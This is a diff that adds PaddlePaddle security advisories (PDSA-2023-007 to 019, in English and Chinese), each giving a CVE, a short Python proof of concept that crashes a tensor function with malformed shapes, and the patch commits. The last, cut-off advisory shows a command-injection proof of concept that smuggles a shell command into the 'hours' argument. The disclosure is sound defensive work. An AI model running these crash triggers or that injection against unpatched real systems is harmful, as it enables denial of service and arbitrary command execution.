`paddle.linalg.matrix_rank` triggers FPE by `numel / (rows * cols)`. The PoC is as follows: + +```python +import paddle +import numpy as np + +x = np.random.uniform(0,0,[0,0,0,0,0]).astype(np.float32) +x = paddle.to_tensor(x) +paddle.linalg.matrix_rank(x) +``` + +### Patches + +We have patched the issue in commit [9bb6c669206c4bcc3ce3f6daf8a55650e190c1a1](https://github.com/PaddlePaddle/Paddle/pull/55644/commits/9bb6c669206c4bcc3ce3f6daf8a55650e190c1a1). +The fix will be included in PaddlePaddle 2.6.0. + +### For more information + +Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution + +This vulnerability has been reported by Tong Liu of ShanghaiTech University. diff --git a/security/advisory/pdsa-2023-007_cn.md b/security/advisory/pdsa-2023-007_cn.md new file mode 100644 index 00000000000000..0572aa1767b36d --- /dev/null +++ b/security/advisory/pdsa-2023-007_cn.md @@ -0,0 +1,31 @@ +## PDSA-2023-007: FPE in paddle.linalg.matrix_rank + +### CVE编号 + +CVE-2023-38675 + +### 影响 + +当由`x`的dim计算的`rows`或者`cols`为0时,`paddle.linalg.matrix_rank`会由`numel / (rows * cols)`触发除0异常,PoC代码如下: + +```python +import paddle +import numpy as np + +x = np.random.uniform(0,0,[0,0,0,0,0]).astype(np.float32) +x = paddle.to_tensor(x) +paddle.linalg.matrix_rank(x) +``` + +### 补丁 + +我们在commit [9bb6c669206c4bcc3ce3f6daf8a55650e190c1a1](https://github.com/PaddlePaddle/Paddle/pull/55644/commits/9bb6c669206c4bcc3ce3f6daf8a55650e190c1a1)中对此问题进行了补丁。 +修复将包含在飞桨2.6.0版本当中。 + +### 更多信息 + +请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息,以及如何与我们联系问题。 + +### 贡献者 + +此漏洞由 Tong Liu of ShanghaiTech University 提交。 diff --git a/security/advisory/pdsa-2023-008.md b/security/advisory/pdsa-2023-008.md new file mode 100644 index 00000000000000..8994abd90fc23e --- /dev/null +++ b/security/advisory/pdsa-2023-008.md @@ -0,0 +1,31 @@ +## PDSA-2023-008: Segfault in paddle.dot + +### CVE Number + +CVE-2023-38676 + +### Impact + +Segfault occurs when `x` and `y` shape is 0 in `paddle.dot`. 
The PoC is as follows: + +```python +import paddle +import numpy as np + +x = paddle.to_tensor(np.random.uniform(-6666666, 100000000, [0, 0]).astype(np.float32)) +y = paddle.to_tensor(np.random.uniform(-6666666, 100000000, [0, 0]).astype(np.float32)) +paddle.dot(x, y) +``` + +### Patches + +We have patched the issue in commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc). +The fix will be included in PaddlePaddle 2.6.0. + +### For more information + +Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution + +This vulnerability has been reported by Tong Liu of CAS-IIE. diff --git a/security/advisory/pdsa-2023-008_cn.md b/security/advisory/pdsa-2023-008_cn.md new file mode 100644 index 00000000000000..92052de2f38090 --- /dev/null +++ b/security/advisory/pdsa-2023-008_cn.md @@ -0,0 +1,31 @@ +## PDSA-2023-008: Segfault in paddle.dot + +### CVE编号 + +CVE-2023-38676 + +### 影响 + +在`paddle.dot`中当`x`和`y`的shape为0时,将造成segfault,PoC代码如下: + +```python +import paddle +import numpy as np + +x = paddle.to_tensor(np.random.uniform(-6666666, 100000000, [0, 0]).astype(np.float32)) +y = paddle.to_tensor(np.random.uniform(-6666666, 100000000, [0, 0]).astype(np.float32)) +paddle.dot(x, y) +``` + +### 补丁 + +我们在commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc)中对此问题进行了补丁。 +修复将包含在飞桨2.6.0版本当中。 + +### 更多信息 + +请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息,以及如何与我们联系问题。 + +### 贡献者 + +此漏洞由 Tong Liu of CAS-IIE 提交。 diff --git a/security/advisory/pdsa-2023-009.md b/security/advisory/pdsa-2023-009.md new file mode 100644 index 00000000000000..2f0450f9eb4e32 --- /dev/null +++ b/security/advisory/pdsa-2023-009.md @@ -0,0 +1,31 @@ +## PDSA-2023-009: FPE in paddle.linalg.eig + +### CVE Number + +CVE-2023-38677 + +### Impact + +When tensor dims contain 0, `paddle.linalg.eig` will trigger a float point exception. The PoC is as follows: + +```python +import paddle +import numpy as np + +x = paddle.to_tensor(np.random.uniform(-6666666, 100000000, [3, 6, 0, 2, 2]).astype(np.float32)) + +paddle.linalg.eig(x) +``` + +### Patches + +We have patched the issue in commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc). +The fix will be included in PaddlePaddle 2.6.0. + +### For more information + +Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution + +This vulnerability has been reported by Tong Liu of CAS-IIE. 
diff --git a/security/advisory/pdsa-2023-009_cn.md b/security/advisory/pdsa-2023-009_cn.md new file mode 100644 index 00000000000000..a212a2320c8902 --- /dev/null +++ b/security/advisory/pdsa-2023-009_cn.md @@ -0,0 +1,31 @@ +## PDSA-2023-009: FPE in paddle.linalg.eig + +### CVE编号 + +CVE-2023-38677 + +### 影响 + +当张量包含维度值为0的情况,`paddle.linalg.eig`会触发除0异常,PoC代码如下: + +```python +import paddle +import numpy as np + +x = paddle.to_tensor(np.random.uniform(-6666666, 100000000, [3, 6, 0, 2, 2]).astype(np.float32)) + +paddle.linalg.eig(x) +``` + +### 补丁 + +我们在commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc)中对此问题进行了补丁。 +修复将包含在飞桨2.6.0版本当中。 + +### 更多信息 + +请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息,以及如何与我们联系问题。 + +### 贡献者 + +此漏洞由 Tong Liu of CAS-IIE 提交。 diff --git a/security/advisory/pdsa-2023-010.md b/security/advisory/pdsa-2023-010.md new file mode 100644 index 00000000000000..3f1c65f6c91c4f --- /dev/null +++ b/security/advisory/pdsa-2023-010.md @@ -0,0 +1,33 @@ +## PDSA-2023-010: Segfault in paddle.mode + +### CVE Number + +CVE-2023-38678 + +### Impact + +Invalid `axis` and `dim_size` may cause `paddle.mode` segfault . The PoC is as follows: + +```python +import paddle +import numpy as np + +paddle.mode( + x=paddle.to_tensor(np.random.uniform(-6666666, 100000000, []).astype(np.float64)), + axis=paddle.to_tensor(np.random.uniform(-2147483648, 2147483647, []).astype(np.int32)), + keepdim=True +) +``` + +### Patches + +We have patched the issue in commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc). +The fix will be included in PaddlePaddle 2.6.0. + +### For more information + +Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution + +This vulnerability has been reported by Tong Liu of CAS-IIE. diff --git a/security/advisory/pdsa-2023-010_cn.md b/security/advisory/pdsa-2023-010_cn.md new file mode 100644 index 00000000000000..f72cd8af856360 --- /dev/null +++ b/security/advisory/pdsa-2023-010_cn.md @@ -0,0 +1,33 @@ +## PDSA-2023-010: Segfault in paddle.mode + +### CVE编号 + +CVE-2023-38678 + +### 影响 + +接收异常的`axis`和`dim_size`可能会造成`paddle.mode`发生segfault,PoC代码如下: + +```python +import paddle +import numpy as np + +paddle.mode( + x=paddle.to_tensor(np.random.uniform(-6666666, 100000000, []).astype(np.float64)), + axis=paddle.to_tensor(np.random.uniform(-2147483648, 2147483647, []).astype(np.int32)), + keepdim=True +) +``` + +### 补丁 + +我们在commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc)中对此问题进行了补丁。 +修复将包含在飞桨2.6.0版本当中。 + +### 更多信息 + +请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息,以及如何与我们联系问题。 + +### 贡献者 + +此漏洞由 Tong Liu of CAS-IIE 提交。 diff --git a/security/advisory/pdsa-2023-011.md b/security/advisory/pdsa-2023-011.md new file mode 100644 index 00000000000000..da7985dede7d00 --- /dev/null +++ b/security/advisory/pdsa-2023-011.md @@ -0,0 +1,32 @@ +## PDSA-2023-011: Null pointer dereference in paddle.nextafter + +### CVE Number + +CVE-2023-52302 + +### Impact + +Null pointer dereference in `paddle.nextafter` when tensor dims are invalid . 
The PoC is as follows: + +```python +import paddle +import numpy as np + +paddle.nextafter( + x=paddle.to_tensor(np.random.uniform(-6666666, 100000000, [1, 2]).astype(np.float32)), + y=paddle.to_tensor(np.random.uniform(-6666666, 100000000, [0, 0, 0, 0, 0]).astype(np.float32)) +) +``` + +### Patches + +We have patched the issue in commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc). +The fix will be included in PaddlePaddle 2.6.0. + +### For more information + +Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution + +This vulnerability has been reported by Tong Liu of CAS-IIE. diff --git a/security/advisory/pdsa-2023-011_cn.md b/security/advisory/pdsa-2023-011_cn.md new file mode 100644 index 00000000000000..71440ac2c5d9a2 --- /dev/null +++ b/security/advisory/pdsa-2023-011_cn.md @@ -0,0 +1,32 @@ +## PDSA-2023-011: Null pointer dereference in paddle.nextafter + +### CVE编号 + +CVE-2023-52302 + +### 影响 + +输入张量的维度异常时,`paddle.nextafter`会引发空指针解引用,PoC代码如下: + +```python +import paddle +import numpy as np + +paddle.nextafter( + x=paddle.to_tensor(np.random.uniform(-6666666, 100000000, [1, 2]).astype(np.float32)), + y=paddle.to_tensor(np.random.uniform(-6666666, 100000000, [0, 0, 0, 0, 0]).astype(np.float32)) +) +``` + +### 补丁 + +我们在commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc)中对此问题进行了补丁。 +修复将包含在飞桨2.6.0版本当中。 + +### 更多信息 + +请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息,以及如何与我们联系问题。 + +### 贡献者 + +此漏洞由 Tong Liu of CAS-IIE 提交。 diff --git a/security/advisory/pdsa-2023-012.md b/security/advisory/pdsa-2023-012.md new file mode 100644 index 00000000000000..f659d356154474 --- /dev/null +++ b/security/advisory/pdsa-2023-012.md @@ -0,0 +1,35 @@ +## PDSA-2023-012: Segfault in paddle.put_along_axis + +### CVE Number + +CVE-2023-52303 + +### Impact + +Segfault in `paddle.put_along_axis` when tensor dims are invalid . The PoC is as follows: + +```python +import paddle +import numpy as np + +paddle.put_along_axis( + arr=paddle.to_tensor(np.random.uniform(-2147483648, 2147483647, [1]).astype(np.int32)), + indices=paddle.to_tensor(np.random.uniform(-9223372036854775808, 9223372036854775807, [1]).astype(np.int64)), + values=paddle.to_tensor(np.random.uniform(-2147483648, 2147483647, []).astype(np.int32)), + axis=0, + reduce="assign" +) +``` + +### Patches + +We have patched the issue in commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc). +The fix will be included in PaddlePaddle 2.6.0. + +### For more information + +Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution + +This vulnerability has been reported by Tong Liu of CAS-IIE. 
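Note: in the `paddle.put_along_axis` PoC above, the crash is driven by `indices` values far outside the target dimension rather than by the `axis` itself. A defensive wrapper can validate both before the kernel runs; the snippet below is a sketch of that validation only (`checked_put_along_axis` is a hypothetical helper, not Paddle's API and not the actual patch).

```python
import paddle

def checked_put_along_axis(arr, indices, values, axis, reduce="assign"):
    ndim = arr.ndim
    if not -ndim <= axis < ndim:
        raise ValueError(f"axis={axis} is out of range for a {ndim}-D tensor")
    axis = axis % ndim
    dim_size = arr.shape[axis]
    # every index must address an existing position along `axis`
    if dim_size == 0 or int(indices.max()) >= dim_size or int(indices.min()) < -dim_size:
        raise ValueError("indices fall outside the target dimension")
    return paddle.put_along_axis(arr, indices, values, axis, reduce=reduce)

arr = paddle.to_tensor([[10, 30, 20], [60, 40, 50]], dtype="float32")
idx = paddle.to_tensor([[0]], dtype="int64")
print(checked_put_along_axis(arr, idx, 99.0, axis=0))  # valid call passes through unchanged
```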
diff --git a/security/advisory/pdsa-2023-012_cn.md b/security/advisory/pdsa-2023-012_cn.md new file mode 100644 index 00000000000000..234961cded2359 --- /dev/null +++ b/security/advisory/pdsa-2023-012_cn.md @@ -0,0 +1,35 @@ +## PDSA-2023-012: Segfault in paddle.put_along_axis + +### CVE编号 + +CVE-2023-52303 + +### 影响 + +输入张量的维度异常时,`paddle.put_along_axis`会引发segfault,PoC代码如下: + +```python +import paddle +import numpy as np + +paddle.put_along_axis( + arr=paddle.to_tensor(np.random.uniform(-2147483648, 2147483647, [1]).astype(np.int32)), + indices=paddle.to_tensor(np.random.uniform(-9223372036854775808, 9223372036854775807, [1]).astype(np.int64)), + values=paddle.to_tensor(np.random.uniform(-2147483648, 2147483647, []).astype(np.int32)), + axis=0, + reduce="assign" +) +``` + +### 补丁 + +我们在commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc)中对此问题进行了补丁。 +修复将包含在飞桨2.6.0版本当中。 + +### 更多信息 + +请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息,以及如何与我们联系问题。 + +### 贡献者 + +此漏洞由 Tong Liu of CAS-IIE 提交。 diff --git a/security/advisory/pdsa-2023-013.md b/security/advisory/pdsa-2023-013.md new file mode 100644 index 00000000000000..53deab6f3c346a --- /dev/null +++ b/security/advisory/pdsa-2023-013.md @@ -0,0 +1,32 @@ +## PDSA-2023-013: Stack overflow in paddle.searchsorted + +### CVE Number + +CVE-2023-52304 + +### Impact + +Invalid shapes cause stack buffer overflow in `paddle.searchsorted`. The PoC is as follows: + +```python +import paddle +import numpy as np + +sorted_sequence = paddle.to_tensor(np.array(0)) +values = paddle.to_tensor(np.random.uniform(-10, 10, []).astype(np.float64)) + +paddle.searchsorted(sorted_sequence, values, out_int32=True, right=True) +``` + +### Patches + +We have patched the issue in commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc). +The fix will be included in PaddlePaddle 2.6.0. + +### For more information + +Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution + +This vulnerability has been reported by Tong Liu of CAS-IIE.
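Note: the `paddle.searchsorted` overflow above is triggered by a 0-D `sorted_sequence`. Since the op searches along the last axis, a rank check on the caller side is a cheap mitigation while waiting for the fixed release; this is only an illustrative sketch under that assumption, with a hypothetical wrapper name.

```python
import numpy as np
import paddle

def checked_searchsorted(sorted_sequence, values, **kwargs):
    # A 0-D sequence has no axis to search along; insist on rank >= 1.
    if sorted_sequence.ndim == 0:
        raise ValueError("sorted_sequence must be at least 1-D")
    return paddle.searchsorted(sorted_sequence, values, **kwargs)

seq = paddle.to_tensor(np.array([1.0, 3.0, 5.0, 7.0]))
vals = paddle.to_tensor(np.array([2.0, 6.0]))
print(checked_searchsorted(seq, vals, right=True))  # [1, 3]
```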
diff --git a/security/advisory/pdsa-2023-013_cn.md b/security/advisory/pdsa-2023-013_cn.md new file mode 100644 index 00000000000000..c5210242f651fd --- /dev/null +++ b/security/advisory/pdsa-2023-013_cn.md @@ -0,0 +1,32 @@ +## PDSA-2023-013: Stack overflow in paddle.searchsorted + +### CVE编号 + +CVE-2023-52304 + +### 影响 + +不正确的shapes会引发`paddle.searchsorted`栈溢出,PoC代码如下: + +```python +import paddle +import numpy as np + +sorted_sequence = paddle.to_tensor(np.array(0)) +values = paddle.to_tensor(np.random.uniform(-10, 10, []).astype(np.float64)) + +paddle.searchsorted(sorted_sequence, values, out_int32=True, right=True) +``` + +### 补丁 + +我们在commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc)中对此问题进行了补丁。 +修复将包含在飞桨2.6.0版本当中。 + +### 更多信息 + +请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息,以及如何与我们联系问题。 + +### 贡献者 + +此漏洞由 Tong Liu of CAS-IIE 提交。 diff --git a/security/advisory/pdsa-2023-014.md b/security/advisory/pdsa-2023-014.md new file mode 100644 index 00000000000000..1792f3b21e8fac --- /dev/null +++ b/security/advisory/pdsa-2023-014.md @@ -0,0 +1,32 @@ +## PDSA-2023-014: FPE in paddle.topk + +### CVE Number + +CVE-2023-52305 + +### Impact + +FPE in `paddle.topk` when `x` and `k` dims not correct. The PoC is as follows: + +```python +import paddle +import numpy as np + +x = paddle.to_tensor(np.random.uniform(-6666666, 100000000, [6, 2, 1, 4, 2, 0]).astype(np.float64)) +k = paddle.to_tensor(np.array(1).astype(np.int32)) + +paddle.topk(x, k, axis=2,largest=False, sorted=True) +``` + +### Patches + +We have patched the issue in commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc). +The fix will be included in PaddlePaddle 2.6.0. + +### For more information + +Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution + +This vulnerability has been reported by Tong Liu of CAS-IIE. diff --git a/security/advisory/pdsa-2023-014_cn.md b/security/advisory/pdsa-2023-014_cn.md new file mode 100644 index 00000000000000..d1be63be148d21 --- /dev/null +++ b/security/advisory/pdsa-2023-014_cn.md @@ -0,0 +1,32 @@ +## PDSA-2023-014: FPE in paddle.topk + +### CVE编号 + +CVE-2023-52305 + +### 影响 + +当`x`和`k`的dims不符合要求时,可能导致`paddle.topk`除0异常,PoC代码如下: + +```python +import paddle +import numpy as np + +x = paddle.to_tensor(np.random.uniform(-6666666, 100000000, [6, 2, 1, 4, 2, 0]).astype(np.float64)) +k = paddle.to_tensor(np.array(1).astype(np.int32)) + +paddle.topk(x, k, axis=2,largest=False, sorted=True) +``` + +### 补丁 + +我们在commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc)中对此问题进行了补丁。 +修复将包含在飞桨2.6.0版本当中。 + +### 更多信息 + +请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息,以及如何与我们联系问题。 + +### 贡献者 + +此漏洞由 Tong Liu of CAS-IIE 提交。 diff --git a/security/advisory/pdsa-2023-015.md b/security/advisory/pdsa-2023-015.md new file mode 100644 index 00000000000000..6830516e0505b6 --- /dev/null +++ b/security/advisory/pdsa-2023-015.md @@ -0,0 +1,33 @@ +## PDSA-2023-015: FPE in paddle.lerp + +### CVE Number + +CVE-2023-52306 + +### Impact + +FPE in `paddle.lerp` when tensor shape is invalid. 
The PoC is as follows: + +```python +import paddle +import numpy as np + +x = paddle.to_tensor(np.random.uniform(-6666666, 100000000, []).astype(np.float64)) +y = paddle.to_tensor(np.random.uniform(-6666666, 100000000, [4, 0, 0, 2, 6]).astype(np.float64)) +weight = paddle.to_tensor(np.random.uniform(-6666666, 100000000, []).astype(np.float64)) + +paddle.lerp(x, y, weight) +``` + +### Patches + +We have patched the issue in commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc). +The fix will be included in PaddlePaddle 2.6.0. + +### For more information + +Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution + +This vulnerability has been reported by Tong Liu of CAS-IIE. diff --git a/security/advisory/pdsa-2023-015_cn.md b/security/advisory/pdsa-2023-015_cn.md new file mode 100644 index 00000000000000..7daa17bfff490b --- /dev/null +++ b/security/advisory/pdsa-2023-015_cn.md @@ -0,0 +1,33 @@ +## PDSA-2023-015: FPE in paddle.lerp + +### CVE编号 + +CVE-2023-52306 + +### 影响 + +不合法的张量shape可能导致`paddle.lerp`除0异常,PoC代码如下: + +```python +import paddle +import numpy as np + +x = paddle.to_tensor(np.random.uniform(-6666666, 100000000, []).astype(np.float64)) +y = paddle.to_tensor(np.random.uniform(-6666666, 100000000, [4, 0, 0, 2, 6]).astype(np.float64)) +weight = paddle.to_tensor(np.random.uniform(-6666666, 100000000, []).astype(np.float64)) + +paddle.lerp(x, y, weight) +``` + +### 补丁 + +我们在commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc)中对此问题进行了补丁。 +修复将包含在飞桨2.6.0版本当中。 + +### 更多信息 + +请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息,以及如何与我们联系问题。 + +### 贡献者 + +此漏洞由 Tong Liu of CAS-IIE 提交。 diff --git a/security/advisory/pdsa-2023-016.md b/security/advisory/pdsa-2023-016.md new file mode 100644 index 00000000000000..2c6e93e3f87717 --- /dev/null +++ b/security/advisory/pdsa-2023-016.md @@ -0,0 +1,32 @@ +## PDSA-2023-016: Stack overflow in paddle.linalg.lu_unpack + +### CVE Number + +CVE-2023-52307 + +### Impact + +Invalid shapes cause stack buffer overflow in `paddle.linalg.lu_unpack`. The PoC is as follows: + +```python +import paddle +import numpy as np + +x = paddle.to_tensor(np.random.uniform(-6666666, 100000000, [1, 6, 4, 8, 2]).astype(np.float32)) +y = paddle.to_tensor(np.random.uniform(-2147483648, 2147483647, []).astype(np.int32)) + +paddle.linalg.lu_unpack(x, y, True, True) +``` + +### Patches + +We have patched the issue in commit [10093636a10f29f73f13729b33570d8cafd58fb6](https://github.com/PaddlePaddle/Paddle/pull/56311/commits/10093636a10f29f73f13729b33570d8cafd58fb6). +The fix will be included in PaddlePaddle 2.6.0. + +### For more information + +Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution + +This vulnerability has been reported by Tong Liu of CAS-IIE.
diff --git a/security/advisory/pdsa-2023-016_cn.md b/security/advisory/pdsa-2023-016_cn.md new file mode 100644 index 00000000000000..cdad03e02dce4a --- /dev/null +++ b/security/advisory/pdsa-2023-016_cn.md @@ -0,0 +1,32 @@ +## PDSA-2023-016: Stack overflow in paddle.linalg.lu_unpack + +### CVE编号 + +CVE-2023-52307 + +### 影响 + +不正确的shapes会引发`paddle.linalg.lu_unpack`栈溢出,PoC代码如下: + +```python +import paddle +import numpy as np + +x = paddle.to_tensor(np.random.uniform(-6666666, 100000000, [1, 6, 4, 8, 2]).astype(np.float32)) +y = paddle.to_tensor(np.random.uniform(-2147483648, 2147483647, []).astype(np.int32)) + +paddle.linalg.lu_unpack(x, y, True, True) +``` + +### 补丁 + +我们在commit [10093636a10f29f73f13729b33570d8cafd58fb6](https://github.com/PaddlePaddle/Paddle/pull/56311/commits/10093636a10f29f73f13729b33570d8cafd58fb6)中对此问题进行了补丁。 +修复将包含在飞桨2.6.0版本当中。 + +### 更多信息 + +请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息,以及如何与我们联系问题。 + +### 贡献者 + +此漏洞由 Tong Liu of CAS-IIE 提交。 diff --git a/security/advisory/pdsa-2023-017.md b/security/advisory/pdsa-2023-017.md new file mode 100644 index 00000000000000..2d65947f7be858 --- /dev/null +++ b/security/advisory/pdsa-2023-017.md @@ -0,0 +1,33 @@ +## PDSA-2023-017: FPE in paddle.amin + +### CVE Number + +CVE-2023-52308 + +### Impact + +FPE in `paddle.amin` when `x` has invalid dims. The PoC is as follows: + +```python +import paddle +import numpy as np + +paddle.amin( + x=paddle.to_tensor(np.random.uniform(-6666666, 100000000, [0, 0, 6, 3]).astype(np.float32)), + axis=-1, + keepdim=True +) +``` + +### Patches + +We have patched the issue in commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc). +The fix will be included in PaddlePaddle 2.6.0. + +### For more information + +Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution + +This vulnerability has been reported by Tong Liu of CAS-IIE. diff --git a/security/advisory/pdsa-2023-017_cn.md b/security/advisory/pdsa-2023-017_cn.md new file mode 100644 index 00000000000000..ac04896e1ffeb4 --- /dev/null +++ b/security/advisory/pdsa-2023-017_cn.md @@ -0,0 +1,33 @@ +## PDSA-2023-017: FPE in paddle.amin + +### CVE编号 + +CVE-2023-52308 + +### 影响 + +当`x` dims不符合要求时,可能导致`paddle.amin`除0异常,PoC代码如下: + +```python +import paddle +import numpy as np + +paddle.amin( + x=paddle.to_tensor(np.random.uniform(-6666666, 100000000, [0, 0, 6, 3]).astype(np.float32)), + axis=-1, + keepdim=True +) +``` + +### 补丁 + +我们在commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc)中对此问题进行了补丁。 +修复将包含在飞桨2.6.0版本当中。 + +### 更多信息 + +请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息,以及如何与我们联系问题。 + +### 贡献者 + +此漏洞由 Tong Liu of CAS-IIE 提交。 diff --git a/security/advisory/pdsa-2023-018.md b/security/advisory/pdsa-2023-018.md new file mode 100644 index 00000000000000..6dbec29738b2f8 --- /dev/null +++ b/security/advisory/pdsa-2023-018.md @@ -0,0 +1,32 @@ +## PDSA-2023-018: Heap buffer overflow in paddle.repeat_interleave + +### CVE Number + +CVE-2023-52309 + +### Impact + +Heap buffer overflow in `paddle.repeat_interleave` by using invalid params. 
The PoC is as follows: + +```python +import paddle +import numpy as np + +x = paddle.to_tensor(np.random.uniform(-6666666, 100000000, [4, 4, 8, 3, 2, 4]).astype(np.float64)) +repeats = paddle.to_tensor(np.random.uniform(-2147483648, 2147483647, [2, 1]).astype(np.int32)) + +paddle.repeat_interleave(x, repeats, axis=-2) +``` + +### Patches + +We have patched the issue in commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc). +The fix will be included in PaddlePaddle 2.6.0. + +### For more information + +Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution + +This vulnerability has been reported by Tong Liu of CAS-IIE. diff --git a/security/advisory/pdsa-2023-018_cn.md b/security/advisory/pdsa-2023-018_cn.md new file mode 100644 index 00000000000000..9680099b47d83c --- /dev/null +++ b/security/advisory/pdsa-2023-018_cn.md @@ -0,0 +1,32 @@ +## PDSA-2023-018: Heap buffer overflow in paddle.repeat_interleave + +### CVE编号 + +CVE-2023-52309 + +### 影响 + +非法的参数可能导致`paddle.repeat_interleave`堆溢出,PoC代码如下: + +```python +import paddle +import numpy as np + +x = paddle.to_tensor(np.random.uniform(-6666666, 100000000, [4, 4, 8, 3, 2, 4]).astype(np.float64)) +repeats = paddle.to_tensor(np.random.uniform(-2147483648, 2147483647, [2, 1]).astype(np.int32)) + +paddle.repeat_interleave(x, repeats, axis=-2) +``` + +### 补丁 + +我们在commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc)中对此问题进行了补丁。 +修复将包含在飞桨2.6.0版本当中。 + +### 更多信息 + +请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息,以及如何与我们联系问题。 + +### 贡献者 + +此漏洞由 Tong Liu of CAS-IIE 提交。 diff --git a/security/advisory/pdsa-2023-019.md b/security/advisory/pdsa-2023-019.md new file mode 100644 index 00000000000000..78a7b6b3230f5a --- /dev/null +++ b/security/advisory/pdsa-2023-019.md @@ -0,0 +1,35 @@ +## PDSA-2023-019: Command injection in get_online_pass_interval + +### CVE Number + +CVE-2023-52310 + +### Impact + +Command injection in `get_online_pass_interval` which could lead to execute arbitrary commands. The PoC is as follows: + +```python +from paddle.incubate.distributed.fleet.fleet_util import FleetUtil + +fleet_util = FleetUtil() +online_pass_interval = fleet_util.get_online_pass_interval( + days="{20190720..20190729}", + hours="9;touch /home/test/aaaa", + split_interval=5, + split_per_pass=2, + is_data_hourly_placed=False +) +``` + +### Patches + +We have patched the issue in commits [1aae481dfd7d2055c801563e254f1484b974b68e](https://github.com/PaddlePaddle/Paddle/pull/60023/commits/1aae481dfd7d2055c801563e254f1484b974b68e), [c62d87eb91c84154af40946f17205d86f608866b](https://github.com/PaddlePaddle/Paddle/pull/60544/commits/c62d87eb91c84154af40946f17205d86f608866b) and [f8560c903c80450e37b8f304a9cd8207678f2f83](https://github.com/PaddlePaddle/Paddle/pull/60615/commits/f8560c903c80450e37b8f304a9cd8207678f2f83). +The fix will be included in PaddlePaddle 2.6.0. + +### For more information + +Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution 